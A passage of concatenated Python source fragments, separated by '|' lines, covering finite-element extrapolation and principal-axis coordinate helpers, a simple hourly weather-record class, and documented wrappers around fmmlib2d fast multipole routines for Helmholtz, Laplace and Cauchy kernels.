    :rtype: :class:`numpy.ndarray`
    """
    # precomputed inverse of the Gauss-point-to-node extrapolation matrix
    H_inv = np.array([
        [1.87365927351160, 0.138559587411935, 0.138559587411935, -0.638559587411936,
         0.126340726488397, -0.638559587411935],
        [0.138559587411935, 1.87365927351160, 0.138559587411935, -0.638559587411935,
         -0.638559587411935, 0.126340726488397],
        [0.138559587411935, 0.138559587411935, 1.87365927351160, 0.126340726488396,
         -0.638559587411935, -0.638559587411935],
        [0.0749010751157440, 0.0749010751157440, 0.180053080734478, 1.36051633430762,
         -0.345185782636792, -0.345185782636792],
        [0.180053080734478, 0.0749010751157440, 0.0749010751157440, -0.345185782636792,
         1.36051633430762, -0.345185782636792],
        [0.0749010751157440, 0.180053080734478, 0.0749010751157440, -0.345185782636792,
         -0.345185782636792, 1.36051633430762]
    ])

    return H_inv.dot(w)
def principal_coordinate(phi, x, y):
    """Determines the coordinates of the cartesian point *(x, y)* in the
    principal axis system given an axis rotation angle phi.

    :param float phi: Principal bending axis angle (degrees)
    :param float x: x coordinate in the global axis
    :param float y: y coordinate in the global axis
    :return: Principal axis coordinates *(x1, y2)*
    :rtype: tuple(float, float)
    """
    # principal axis angle in radians
    phi_rad = phi * np.pi / 180

    # rotate the global point into the principal axis system
    c = np.cos(phi_rad)
    s = np.sin(phi_rad)
    rotated = np.array([[c, s], [-s, c]]).dot(np.array([x, y]))

    return (rotated[0], rotated[1])
def global_coordinate(phi, x11, y22):
    """Determines the global coordinates of the principal axis point *(x1, y2)* given principal
    axis rotation angle phi.

    :param float phi: Principal bending axis angle (degrees)
    :param float x11: 11 coordinate in the principal axis
    :param float y22: 22 coordinate in the principal axis
    :return: Global axis coordinates *(x, y)*
    :rtype: tuple(float, float)
    """
    # principal axis angle in radians
    phi_rad = phi * np.pi / 180

    # inverse (transposed) rotation back into the global axis system
    c = np.cos(phi_rad)
    s = np.sin(phi_rad)
    rotated = np.array([[c, -s], [s, c]]).dot(np.array([x11, y22]))

    return (rotated[0], rotated[1])
def point_above_line(u, px, py, x, y):
    """Determines whether a point *(x, y)* is a above or below the line defined by the parallel
    unit vector *u* and the point *(px, py)*.

    :param u: Unit vector parallel to the line [1 x 2]
    :type u: :class:`numpy.ndarray`
    :param float px: x coordinate of a point on the line
    :param float py: y coordinate of a point on the line
    :param float x: x coordinate of the point to be tested
    :param float y: y coordinate of the point to be tested
    :return: This method returns *True* if the point is above the line or *False* if the point is
        below the line
    :rtype: bool
    """
    # vector from the test point to the point on the line; the sign of its
    # cross product with u gives the side of the line the point lies on
    offset = np.array([px - x, py - y])
    return np.cross(offset, u) > 0
|
class Hourly:
    """Container for a single hourly weather record.

    Attributes (set verbatim from the constructor arguments, no validation
    or conversion is performed):
        temp       -- temperature reading
        feels_like -- apparent ("feels like") temperature
        pressure   -- atmospheric pressure
        humidity   -- relative humidity
        wind_speed -- wind speed
        date       -- date/time the record refers to
        city       -- city the record belongs to
        weather    -- weather description
    """

    def __init__(self, temp, feels_like, pressure, humidity, wind_speed, date, city, weather):
        self.temp = temp
        self.feels_like = feels_like
        self.pressure = pressure
        self.humidity = humidity
        self.wind_speed = wind_speed
        self.date = date
        self.city = city
        self.weather = weather

    def __repr__(self):
        """Return a debug-friendly representation of the record."""
        return ('Hourly(temp={!r}, feels_like={!r}, pressure={!r}, humidity={!r}, '
                'wind_speed={!r}, date={!r}, city={!r}, weather={!r})').format(
            self.temp, self.feels_like, self.pressure, self.humidity,
            self.wind_speed, self.date, self.city, self.weather)
|
import numpy as np
from fmmlib2d import hfmm2dparttarg
from fmmlib2d import lfmm2dparttarg
from fmmlib2d import rfmm2dparttarg
from fmmlib2d import zfmm2dparttarg
from fmmlib2d import cfmm2dparttarg
from fmmlib2d import h2dpartdirect
from fmmlib2d import l2dpartdirect
from fmmlib2d import r2dpartdirect
from fmmlib2d import z2dpartdirect
from fmmlib2d import c2dpartdirect
from stokesfmm import bhfmm2dparttarg
def initialize_precision(iprec):
    """Clamp the requested FMM precision flag to the supported range [-2, 5]
    and return it as an int."""
    return int(min(max(iprec, -2), 5))
def get_dummy_shape(shape):
    """Return the minimal placeholder shape used for an absent optional array:
    (1,) for 1-d specs, (k, 1) for 2-d specs (k, ...)."""
    return (1,) if len(shape) == 1 else (shape[0], 1)
def check_array(arr, shape, mytype, name, return_2dim=False):
    """
    Function to make sure an array is acceptable
    If arr is None:
        returns dummy array, int(0)
    Else:
        Throws error if:
            not a numpy array
            shape is not correct
                note: if shape is (k,None), won't check one second dim size
            type is not as specified
                will cast float to complex without an error
                will NOT cast complex to float
        Reallocates if:
            not Fortran contiguous
    Note: name is just to help throw useful errors to the user
    Returns:
        original array or reallocated array, int(1)
        If return_2dim, also returns the second dim size
    """
    if arr is None:
        # absent optional argument: hand the Fortran layer a minimal dummy
        # array and flag it as "not present"
        sh = get_dummy_shape(shape)
        arr = np.empty(sh, order='F', dtype=mytype)
        here = int(0)
    else:
        if type(arr) is not np.ndarray:
            raise Exception(name + ' must be numpy array')
        sh = arr.shape
        if len(sh) != len(shape) or sh[0] != shape[0]:
            raise Exception(name + ' does not have correct shape.')
        # a second dim of None in the spec means "any size"
        if len(sh) > 1 and shape[1] is not None and sh[1] != shape[1]:
            raise Exception(name + ' does not have correct shape.')
        if arr.dtype != mytype:
            # only the float -> complex upcast is permitted
            if not (arr.dtype == float and mytype == complex):
                raise Exception(name + ' must have type ' + str(mytype))
            arr = arr.astype(mytype, order='F', copy=False)
        # the Fortran routines require column-major data; reallocate if needed
        # (this was promised by the docstring but previously not performed)
        if not arr.flags['F_CONTIGUOUS']:
            arr = np.asfortranarray(arr)
        here = int(1)
    if return_2dim:
        # for a dummy array this is the placeholder second dim (1)
        return arr, here, sh[1]
    else:
        return arr, here
def check_output(arr, used, shape, mytype):
    """
    Validate or allocate an output array.

    If used is False:
        returns a dummy array and int(0)
    If used is True:
        returns arr and int(1) when arr has the right shape, the right type
        and is Fortran contiguous; otherwise returns a freshly allocated
        array with the right shape/type/contiguity and int(1)
    """
    if used:
        if arr is not None:
            # discard the caller-supplied array unless it is usable as-is
            acceptable = (
                arr.shape == shape
                and arr.dtype == mytype
                and arr.flags['F_CONTIGUOUS']
            )
            if not acceptable:
                arr = None
        if arr is None:
            arr = np.empty(shape, order='F', dtype=mytype)
        else:
            # no-op pass-through for an already-acceptable array
            arr = arr.astype(mytype, order='F', copy=False)
    else:
        # output not requested: hand back a minimal placeholder
        arr = np.empty(get_dummy_shape(shape), order='F', dtype=mytype)
    return arr, int(used)
def get_fmmlib2d_output(csp, csg, csh, sp, sg, sh, ctp, ctg, cth, tp, tg, th, ier):
    """Assemble the result dictionary for the FMM wrappers.

    The c* flags say which quantities were computed at the source (cs*) and
    target (ct*) locations; sp/sg/sh and tp/tg/th are the corresponding
    potential, gradient and hessian arrays. Named component views ('u',
    'u_x', ..., 'u_yy') are added alongside the packed arrays.
    """
    def _collect(want_pot, want_grad, want_hess, pot, grad, hess):
        # build the per-location sub-dictionary, including named views
        sub = {}
        if want_pot:
            sub['Pu'] = pot
            sub['u'] = pot[0]
        if want_grad:
            sub['Du'] = grad
            sub['u_x'] = grad[0]
            sub['u_y'] = grad[1]
        if want_hess:
            sub['Hu'] = hess
            sub['u_xx'] = hess[0]
            sub['u_xy'] = hess[1]
            sub['u_yx'] = hess[1]
            sub['u_yy'] = hess[2]
        return sub

    output = {}
    if csp or csg or csh:
        output['source'] = _collect(csp, csg, csh, sp, sg, sh)
    if ctp or ctg or cth:
        output['target'] = _collect(ctp, ctg, cth, tp, tg, th)
    output['ier'] = ier
    return output
def get_fmmlib2d_output_cauchy(csp, csg, csh, sp, sg, sh, ctp, ctg, cth, tp, tg, th, ier):
    """Assemble the result dictionary for the Cauchy FMM wrappers.

    Same layout as get_fmmlib2d_output but without per-component views:
    only 'u', 'Du' and 'Hu' entries are populated for each location.
    """
    def _collect(entries):
        # keep only the requested quantities
        return {key: val for (want, key, val) in entries if want}

    output = {}
    if csp or csg or csh:
        output['source'] = _collect([(csp, 'u', sp), (csg, 'Du', sg), (csh, 'Hu', sh)])
    if ctp or ctg or cth:
        output['target'] = _collect([(ctp, 'u', tp), (ctg, 'Du', tg), (cth, 'Hu', th)])
    output['ier'] = ier
    return output
def FMM(kind, **kwargs):
    """
    Pythonic interface to Particle FMM Routines for:
        Helmholtz, Laplace, Cauchy, Biharmonic, and Stokes
    This function calls the following functions:
        HFMM: (kind='helmholtz')
        LFMM: (kind='laplace-complex')
        RFMM: (kind='laplace-real' or 'laplace')
        ZFMM: (kind='cauchy')
        CFMM: (kind='cauchy-general')
        BFMM: (kind='biharmonic')
        SFMM: (kind='stokes')
    Please see help files for individual functions for more details.
    Details on the 'precision' parameter (this is the same across all functions):
        precision (optional), int: precision requested of FMM
            -2: least squares errors < 0.5e+00
            -1: least squares errors < 0.5e-01
             0: least squares errors < 0.5e-02
             1: least squares errors < 0.5e-03
             2: least squares errors < 0.5e-06
             3: least squares errors < 0.5e-09
             4: least squares errors < 0.5e-12
             5: least squares errors < 0.5e-15
            note that this is ignored if direct=True
            and defaults to 4 for all routines
    """
    # dispatch on the kind string; function_map is the module-level dict
    # mapping kind names to the wrapper functions listed above (a KeyError
    # here means an unsupported kind was requested)
    return function_map[kind](**kwargs)
def HFMM(
        source,
        target = None,
        charge = None,
        dipstr = None,
        dipvec = None,
        direct = False,
        compute_source_potential = False,
        compute_source_gradient = False,
        compute_source_hessian = False,
        compute_target_potential = False,
        compute_target_gradient = False,
        compute_target_hessian = False,
        array_source_potential = None,
        array_source_gradient = None,
        array_source_hessian = None,
        array_target_potential = None,
        array_target_gradient = None,
        array_target_hessian = None,
        precision = 4,
        helmholtz_parameter = 1.0,
    ):
    """
    Pythonic interface for Helmholtz Particle FMM
    Wraps the two functions:
        hfmm2dparttarg - (if direct=False)
        h2dpartdirect  - (if direct=True)
    Parameters:
        source (required), float(2, ns): location of sources
        target (optional), float(2, nt): location of targets
        charge (optional), complex(ns): charges at source locations
        dipstr (optional), complex(ns): dipole at source locations
        dipvec (optional), float(2, ns): orientation vector of dipoles
            if dipstr is set, then dipvec must be, also
        direct (optional), bool: do direct sum or FMM
        compute_#_* (optional), bool: whether to compute * at # locations
        array_#_* (optional), complex(k,n): preallocated arrays for result
            k = 1 for *=potential, 2 for *=gradient, 3 for *=hessian
            n = ns for #=source, nt for #=target
            if these arrays are not provided, are not of the correct size, not
            of the correct type, or not fortran contiguous, new arrays for
            the results will be allocated at runtime
        precision (optional), float: precision, see documentation for FMM
        helmholtz_parameter (optional), complex: complex helmholtz parameter
    Returns:
        Dictionary:
            'ier': (integer) output code
                0: successful completion of code
                4: failure to allocate memory for tree
                8: failure to allocate memory for FMM workspaces
                16: failure to allocate memory for multipole/local
                    expansions
            'source': (quantities computed at source locations)
                'Pu'   : complex(1,ns), potential
                'u'    : complex(ns), potential
                'u_x'  : complex(ns), x-derivative of potential
                'u_y'  : complex(ns), y-derivative of potential
                'Du'   : complex(2,ns), gradient of potential
                'u_xx' : complex(ns), xx-derivative of potential
                'u_xy' : complex(ns), xy-derivative of potential
                'u_yx' : complex(ns), yx-derivative of potential
                'u_yy' : complex(ns), xy-derivative of potential
                'Hu'   : complex(3,ns), hessian of potential
            'target': (quantities computed at target locations):
                same as above, but for target related things
                ns replaced by nt, in the shapes
    Some notes about the output:
        1) 'u', 'u_x', 'u_y', 'u_xx', 'u_xy', 'u_yx', and 'u_yy' are
            not duplications; they are simply views
            into the arrays 'Pu', Du' and 'Hu', organized as follows:
            Pu[0] = u
            Du[0] = u_x
            Du[1] = u_y
            Hu[0] = u_xx
            Hu[1] = u_xy
            Hu[1] = u_yx
            Hu[2] = u_yy
        2) If array_#_* is provided and was acceptable, the code:
            "array_#_* is output['#']['**']"
            will return True (note ** is Pu for *=potential,
            Du for *=gradient, Hu for *=Hessian)
            If the array was provided but incorrect, then the code
            will return False
        3) Entries of the dictionary will only exist if they were asked for
            i.e. if no 'source' quantities were requested, the 'source'
            dictionary will not exist
    """
    # validate/convert the inputs; the if* flags tell the Fortran layer
    # which optional densities are actually present
    source, _, ns = check_array(source, (2,None), float, 'source', True)
    charge, ifcharge = check_array(charge, (ns,), complex, 'charge')
    dipstr, ifdipstr = check_array(dipstr, (ns,), complex, 'dipstr')
    dipvec, ifdipvec = check_array(dipvec, (2,ns), float, 'dipvec')
    if ifdipstr and not ifdipvec:
        raise Exception('If dipstr is provided, dipvec must be also')
    # validate or allocate the requested source-evaluation output arrays
    pot, ifpot = check_output(array_source_potential,
        compute_source_potential, (1,ns), complex)
    grad, ifgrad = check_output(array_source_gradient,
        compute_source_gradient, (2,ns), complex)
    hess, ifhess = check_output(array_source_hessian,
        compute_source_hessian, (3,ns), complex)
    # targets are optional but required if any target quantity was requested
    target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
    if not iftarget:
        if compute_target_potential or compute_target_gradient \
                or compute_target_hessian:
            raise Exception('If asking for a target quanitity, \
                target must be given')
    # validate or allocate the requested target-evaluation output arrays
    pottarg, ifpottarg = check_output(array_target_potential,
        compute_target_potential, (1,nt), complex)
    gradtarg, ifgradtarg = check_output(array_target_gradient,
        compute_target_gradient, (2,nt), complex)
    hesstarg, ifhesstarg = check_output(array_target_hessian,
        compute_target_hessian, (3,nt), complex)
    # NOTE(review): ier is a plain Python int passed positionally; whether the
    # f2py binding actually reports errors through it depends on the wrapper's
    # intent declarations - verify against the fmmlib2d signature
    ier = int(0)
    iprec = initialize_precision(precision)
    zk = complex(helmholtz_parameter)
    if direct:
        # O(ns*nt) direct summation; precision flag is ignored on this path
        h2dpartdirect(zk, ns, source, ifcharge, charge, ifdipstr, dipstr,
            dipvec, ifpot, pot, ifgrad, grad, ifhess, hess, nt, target,
            ifpottarg, pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
    else:
        # fast multipole evaluation at the requested precision
        hfmm2dparttarg(ier, iprec, zk, ns, source, ifcharge, charge,
            ifdipstr, dipstr, dipvec, ifpot, pot, ifgrad, grad, ifhess,
            hess, nt, target, ifpottarg, pottarg, ifgradtarg, gradtarg,
            ifhesstarg, hesstarg)
    # package the raw Fortran outputs into the documented dictionary
    out = get_fmmlib2d_output(
        compute_source_potential,
        compute_source_gradient,
        compute_source_hessian,
        pot, grad, hess,
        compute_target_potential,
        compute_target_gradient,
        compute_target_hessian,
        pottarg, gradtarg, hesstarg,
        ier
    )
    return out
def LFMM(
        source,
        target = None,
        charge = None,
        dipstr = None,
        dipvec = None,
        direct = False,
        compute_source_potential = False,
        compute_source_gradient = False,
        compute_source_hessian = False,
        compute_target_potential = False,
        compute_target_gradient = False,
        compute_target_hessian = False,
        array_source_potential = None,
        array_source_gradient = None,
        array_source_hessian = None,
        array_target_potential = None,
        array_target_gradient = None,
        array_target_hessian = None,
        precision = 4,
    ):
    """
    Pythonic interface for Laplace Particle FMM (complex densities)
    Wraps the two functions:
        lfmm2dparttarg - (if direct=False)
        l2dpartdirect  - (if direct=True)
    Parameters:
        source (required), float(2, ns): location of sources
        target (optional), float(2, nt): location of targets
        charge (optional), complex(ns): charges at source locations
        dipstr (optional), complex(ns): dipole at source locations
        dipvec (optional), float(2, ns): orientation vector of dipoles
            if dipstr is set, then dipvec must be, also
        direct (optional), bool: do direct sum or FMM
        compute_#_* (optional), bool: whether to compute * at # locations
        array_#_* (optional), complex(k,n): preallocated arrays for result
            k = 1 for *=potential, 2 for *=gradient, 3 for *=hessian
            n = ns for #=source, nt for #=target
            if these arrays are not provided, are not of the correct size, not
            of the correct type, or not fortran contiguous, new arrays for
            the results will be allocated at runtime
        precision (optional), float: precision, see documentation for FMM
    Returns:
        Dictionary:
            'ier': (integer) output code
                0: successful completion of code
                4: failure to allocate memory for tree
                8: failure to allocate memory for FMM workspaces
                16: failure to allocate memory for multipole/local
                    expansions
            'source': (quantities computed at source locations)
                'Pu'   : complex(1,ns), potential
                'u'    : complex(ns), potential
                'u_x'  : complex(ns), x-derivative of potential
                'u_y'  : complex(ns), y-derivative of potential
                'Du'   : complex(2,ns), gradient of potential
                'u_xx' : complex(ns), xx-derivative of potential
                'u_xy' : complex(ns), xy-derivative of potential
                'u_yx' : complex(ns), yx-derivative of potential
                'u_yy' : complex(ns), xy-derivative of potential
                'Hu'   : complex(3,ns), hessian of potential
            'target': (quantities computed at target locations):
                same as above, but for target related things
                ns replaced by nt, in the shapes
    Some notes about the output:
        1) 'u', 'u_x', 'u_y', 'u_xx', 'u_xy', 'u_yx', and 'u_yy' are
            not duplications; they are simply views
            into the arrays 'Pu', Du' and 'Hu', organized as follows:
            Pu[0] = u
            Du[0] = u_x
            Du[1] = u_y
            Hu[0] = u_xx
            Hu[1] = u_xy
            Hu[1] = u_yx
            Hu[2] = u_yy
        2) If array_#_* is provided and was acceptable, the code:
            "array_#_* is output['#']['**']"
            will return True (note ** is Pu for *=potential,
            Du for *=gradient, Hu for *=Hessian)
            If the array was provided but incorrect, then the code
            will return False
        3) Entries of the dictionary will only exist if they were asked for
            i.e. if no 'source' quantities were requested, the 'source'
            dictionary will not exist
    """
    # validate/convert the inputs; the if* flags tell the Fortran layer
    # which optional densities are actually present
    source, _, ns = check_array(source, (2,None), float, 'source', True)
    charge, ifcharge = check_array(charge, (ns,), complex, 'charge')
    dipstr, ifdipstr = check_array(dipstr, (ns,), complex, 'dipstr')
    dipvec, ifdipvec = check_array(dipvec, (2,ns), float, 'dipvec')
    if ifdipstr and not ifdipvec:
        raise Exception('If dipstr is provided, dipvec must be also')
    # validate or allocate the requested source-evaluation output arrays
    pot, ifpot = check_output(array_source_potential,
        compute_source_potential, (1,ns), complex)
    grad, ifgrad = check_output(array_source_gradient,
        compute_source_gradient, (2,ns), complex)
    hess, ifhess = check_output(array_source_hessian,
        compute_source_hessian, (3,ns), complex)
    # targets are optional but required if any target quantity was requested
    target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
    if not iftarget:
        if compute_target_potential or compute_target_gradient \
                or compute_target_hessian:
            raise Exception('If asking for a target quanitity, \
                target must be given')
    # validate or allocate the requested target-evaluation output arrays
    pottarg, ifpottarg = check_output(array_target_potential,
        compute_target_potential, (1,nt), complex)
    gradtarg, ifgradtarg = check_output(array_target_gradient,
        compute_target_gradient, (2,nt), complex)
    hesstarg, ifhesstarg = check_output(array_target_hessian,
        compute_target_hessian, (3,nt), complex)
    # NOTE(review): ier is a plain Python int passed positionally; whether the
    # f2py binding actually reports errors through it depends on the wrapper's
    # intent declarations - verify against the fmmlib2d signature
    ier = int(0)
    iprec = initialize_precision(precision)
    if direct:
        # O(ns*nt) direct summation; precision flag is ignored on this path
        l2dpartdirect(ns, source, ifcharge, charge, ifdipstr, dipstr, dipvec,
            ifpot, pot, ifgrad, grad, ifhess, hess, nt, target, ifpottarg,
            pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
    else:
        # fast multipole evaluation at the requested precision
        lfmm2dparttarg(ier, iprec, ns, source, ifcharge, charge, ifdipstr,
            dipstr, dipvec, ifpot, pot, ifgrad, grad, ifhess, hess, nt, target,
            ifpottarg, pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
    # package the raw Fortran outputs into the documented dictionary
    out = get_fmmlib2d_output(
        compute_source_potential,
        compute_source_gradient,
        compute_source_hessian,
        pot, grad, hess,
        compute_target_potential,
        compute_target_gradient,
        compute_target_hessian,
        pottarg, gradtarg, hesstarg,
        ier
    )
    return out
def RFMM(
    source,
    target = None,
    charge = None,
    dipstr = None,
    dipvec = None,
    direct = False,
    compute_source_potential = False,
    compute_source_gradient = False,
    compute_source_hessian = False,
    compute_target_potential = False,
    compute_target_gradient = False,
    compute_target_hessian = False,
    array_source_potential = None,
    array_source_gradient = None,
    array_source_hessian = None,
    array_target_potential = None,
    array_target_gradient = None,
    array_target_hessian = None,
    precision = 4,
):
    """
    Pythonic interface for Laplace Particle FMM (real densities)

    Wraps the two functions:
        rfmm2dparttarg - (if direct=False)
        r2dpartdirect  - (if direct=True)

    Parameters:
        source (required), float(2, ns): location of sources
        target (optional), float(2, nt): location of targets
        charge (optional), float(ns): charges at source locations
        dipstr (optional), float(ns): dipole at source locations
        dipvec (optional), float(2, ns): orientation vector of dipoles
            if dipstr is set, then dipvec must be, also
        direct (optional), bool: do direct sum or FMM
        compute_#_* (optional), bool: whether to compute * at # locations
        array_#_* (optional), float(k,n): preallocated arrays for result
            k = 1 for *=potential, 2 for *=gradient, 3 for *=hessian
            n = ns for #=source, nt for #=target
            if these arrays are not provided, are not of the correct size, not
            of the correct type, or not fortran contiguous, new arrays for
            the results will be allocated at runtime
        precision (optional), float: precision, see documentation for FMM

    Returns:
        Dictionary:
            'ier': (integer) output code
                0:  successful completion of code
                4:  failure to allocate memory for tree
                8:  failure to allocate memory for FMM workspaces
                16: failure to allocate memory for multipole/local
                    expansions
            'source': (quantities computed at source locations)
                'Pu'   : float(1,ns), potential
                'u'    : float(ns), potential
                'u_x'  : float(ns), x-derivative of potential
                'u_y'  : float(ns), y-derivative of potential
                'Du'   : float(2,ns), gradient of potential
                'u_xx' : float(ns), xx-derivative of potential
                'u_xy' : float(ns), xy-derivative of potential
                'u_yx' : float(ns), yx-derivative of potential
                'u_yy' : float(ns), yy-derivative of potential
                'Hu'   : float(3,ns), hessian of potential
            'target': (quantities computed at target locations):
                same as above, but for target related things
                ns replaced by nt, in the shapes
        Some notes about the output:
            1) 'u', 'u_x', 'u_y', 'u_xx', 'u_xy', 'u_yx', and 'u_yy' are
                not duplications; they are simply views
                into the arrays 'Pu', 'Du' and 'Hu', organized as follows:
                Pu[0] = u
                Du[0] = u_x
                Du[1] = u_y
                Hu[0] = u_xx
                Hu[1] = u_xy
                Hu[1] = u_yx (the mixed partials share one view)
                Hu[2] = u_yy
            2) If array_#_* is provided and was acceptable, the code:
                "array_#_* is output['#']['**']"
                will return True (note ** is Pu for *=potential,
                Du for *=gradient, Hu for *=Hessian)
                If the array was provided but incorrect, then the code
                will return False
            3) Entries of the dictionary will only exist if they were asked for
                i.e. if no 'source' quantities were requested, the 'source'
                dictionary will not exist
    """
    # validate inputs; densities for the real Laplace FMM are float valued
    source, _, ns = check_array(source, (2,None), float, 'source', True)
    charge, ifcharge = check_array(charge, (ns,), float, 'charge')
    dipstr, ifdipstr = check_array(dipstr, (ns,), float, 'dipstr')
    dipvec, ifdipvec = check_array(dipvec, (2,ns), float, 'dipvec')
    if ifdipstr and not ifdipvec:
        raise Exception('If dipstr is provided, dipvec must be also')
    # accept preallocated output arrays if usable, otherwise allocate fresh
    pot, ifpot = check_output(array_source_potential,
        compute_source_potential, (1,ns), float)
    grad, ifgrad = check_output(array_source_gradient,
        compute_source_gradient, (2,ns), float)
    hess, ifhess = check_output(array_source_hessian,
        compute_source_hessian, (3,ns), float)
    target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
    if not iftarget:
        if compute_target_potential or compute_target_gradient \
                or compute_target_hessian:
            raise Exception('If asking for a target quantity, '
                'target must be given')
    pottarg, ifpottarg = check_output(array_target_potential,
        compute_target_potential, (1,nt), float)
    gradtarg, ifgradtarg = check_output(array_target_gradient,
        compute_target_gradient, (2,nt), float)
    hesstarg, ifhesstarg = check_output(array_target_hessian,
        compute_target_hessian, (3,nt), float)
    ier = int(0)
    iprec = initialize_precision(precision)
    if direct:
        # O(ns*nt) direct summation; argument order fixed by the Fortran API
        r2dpartdirect(ns, source, ifcharge, charge, ifdipstr, dipstr, dipvec,
            ifpot, pot, ifgrad, grad, ifhess, hess, nt, target, ifpottarg,
            pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
    else:
        rfmm2dparttarg(ier, iprec, ns, source, ifcharge, charge, ifdipstr,
            dipstr, dipvec, ifpot, pot, ifgrad, grad, ifhess, hess, nt, target,
            ifpottarg, pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
    # package requested quantities (and named views) into the output dict
    out = get_fmmlib2d_output(
        compute_source_potential,
        compute_source_gradient,
        compute_source_hessian,
        pot, grad, hess,
        compute_target_potential,
        compute_target_gradient,
        compute_target_hessian,
        pottarg, gradtarg, hesstarg,
        ier
    )
    return out
def ZFMM(
    source,
    target = None,
    dipstr = None,
    direct = False,
    compute_source_potential = False,
    compute_source_gradient = False,
    compute_source_hessian = False,
    compute_target_potential = False,
    compute_target_gradient = False,
    compute_target_hessian = False,
    array_source_potential = None,
    array_source_gradient = None,
    array_source_hessian = None,
    array_target_potential = None,
    array_target_gradient = None,
    array_target_hessian = None,
    precision = 4,
):
    """
    Pythonic interface for Cauchy Particle FMM

    Wraps the two functions:
        zfmm2dparttarg - (if direct=False)
        z2dpartdirect  - (if direct=True)

    Parameters:
        source (required), float(2, ns): location of sources
        target (optional), float(2, nt): location of targets
        dipstr (required), complex(ns): dipole at source locations
        direct (optional), bool: do direct sum or FMM
        compute_#_* (optional), bool: whether to compute * at # locations
        array_#_* (optional), complex(n): preallocated arrays for result
            n = ns for #=source, nt for #=target
            if these arrays are not provided, are not of the correct size, not
            of the correct type, or not fortran contiguous, new arrays for
            the results will be allocated at runtime
        precision (optional), float: precision, see documentation for FMM

    Returns:
        Dictionary:
            'ier': (integer) output code
                0:  successful completion of code
                4:  failure to allocate memory for tree
                8:  failure to allocate memory for FMM workspaces
                16: failure to allocate memory for multipole/local
                    expansions
            'source': (quantities computed at source locations)
                'u'  : complex(ns), potential
                'Du' : complex(ns), gradient of potential
                'Hu' : complex(ns), hessian of potential
            'target': (quantities computed at target locations):
                same as above, but for target related things
                ns replaced by nt, in the shapes
        Some notes about the output:
            1) If array_#_* is provided and was acceptable, the code:
                "array_#_* is output['#']['**']"
                will return True (note ** is u for *=potential,
                Du for *=gradient, Hu for *=Hessian)
                If the array was provided but incorrect, then the code
                will return False
            2) Entries of the dictionary will only exist if they were asked for
                i.e. if no 'source' quantities were requested, the 'source'
                dictionary will not exist
    """
    source, _, ns = check_array(source, (2,None), float, 'source', True)
    dipstr, ifdipstr = check_array(dipstr, (ns,), complex, 'dipstr')
    # the Cauchy sum has no charge term, so the dipole density is mandatory
    if not ifdipstr:
        raise Exception("For fmm kind 'cauchy', dipstr must be provided")
    pot, ifpot = check_output(array_source_potential,
        compute_source_potential, (ns,), complex)
    grad, ifgrad = check_output(array_source_gradient,
        compute_source_gradient, (ns,), complex)
    hess, ifhess = check_output(array_source_hessian,
        compute_source_hessian, (ns,), complex)
    target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
    if not iftarget:
        if compute_target_potential or compute_target_gradient \
                or compute_target_hessian:
            raise Exception('If asking for a target quantity, '
                'target must be given')
    pottarg, ifpottarg = check_output(array_target_potential,
        compute_target_potential, (nt,), complex)
    gradtarg, ifgradtarg = check_output(array_target_gradient,
        compute_target_gradient, (nt,), complex)
    hesstarg, ifhesstarg = check_output(array_target_hessian,
        compute_target_hessian, (nt,), complex)
    ier = int(0)
    iprec = initialize_precision(precision)
    if direct:
        # O(ns*nt) direct summation; argument order fixed by the Fortran API
        z2dpartdirect(ns, source, dipstr, ifpot, pot, ifgrad, grad, ifhess,
            hess, nt, target, ifpottarg, pottarg, ifgradtarg, gradtarg,
            ifhesstarg, hesstarg)
    else:
        zfmm2dparttarg(ier, iprec, ns, source, dipstr, ifpot, pot, ifgrad, grad,
            ifhess, hess, nt, target, ifpottarg, pottarg, ifgradtarg, gradtarg,
            ifhesstarg, hesstarg)
    # package requested quantities into the output dict
    out = get_fmmlib2d_output_cauchy(
        compute_source_potential,
        compute_source_gradient,
        compute_source_hessian,
        pot, grad, hess,
        compute_target_potential,
        compute_target_gradient,
        compute_target_hessian,
        pottarg, gradtarg, hesstarg,
        ier
    )
    return out
def CFMM(
    source,
    target = None,
    charge = None,
    dipstr = None,
    direct = False,
    compute_source_potential = False,
    compute_source_gradient = False,
    compute_source_hessian = False,
    compute_target_potential = False,
    compute_target_gradient = False,
    compute_target_hessian = False,
    array_source_potential = None,
    array_source_gradient = None,
    array_source_hessian = None,
    array_target_potential = None,
    array_target_gradient = None,
    array_target_hessian = None,
    precision = 4,
):
    """
    Pythonic interface for Cauchy Particle FMM (general)

    Wraps the two functions:
        cfmm2dparttarg - (if direct=False)
        c2dpartdirect  - (if direct=True)

    Parameters:
        source (required), float(2, ns): location of sources
        target (optional), float(2, nt): location of targets
        charge (optional), complex(ns): charges at source locations
        dipstr (optional), complex(ns): dipole at source locations
        direct (optional), bool: do direct sum or FMM
        compute_#_* (optional), bool: whether to compute * at # locations
        array_#_* (optional), complex(n): preallocated arrays for result
            n = ns for #=source, nt for #=target
            if these arrays are not provided, are not of the correct size, not
            of the correct type, or not fortran contiguous, new arrays for
            the results will be allocated at runtime
        precision (optional), float: precision, see documentation for FMM

    Returns:
        Dictionary:
            'ier': (integer) output code
                0:  successful completion of code
                4:  failure to allocate memory for tree
                8:  failure to allocate memory for FMM workspaces
                16: failure to allocate memory for multipole/local
                    expansions
            'source': (quantities computed at source locations)
                'u'  : complex(ns), potential
                'Du' : complex(ns), gradient of potential
                'Hu' : complex(ns), hessian of potential
            'target': (quantities computed at target locations):
                same as above, but for target related things
                ns replaced by nt, in the shapes
        Some notes about the output:
            1) If array_#_* is provided and was acceptable, the code:
                "array_#_* is output['#']['**']"
                will return True (note ** is u for *=potential,
                Du for *=gradient, Hu for *=Hessian)
                If the array was provided but incorrect, then the code
                will return False
            2) Entries of the dictionary will only exist if they were asked for
                i.e. if no 'source' quantities were requested, the 'source'
                dictionary will not exist
    """
    source, _, ns = check_array(source, (2,None), float, 'source', True)
    charge, ifcharge = check_array(charge, (ns,), complex, 'charge')
    dipstr, ifdipstr = check_array(dipstr, (ns,), complex, 'dipstr')
    # accept preallocated output arrays if usable, otherwise allocate fresh
    pot, ifpot = check_output(array_source_potential,
        compute_source_potential, (ns,), complex)
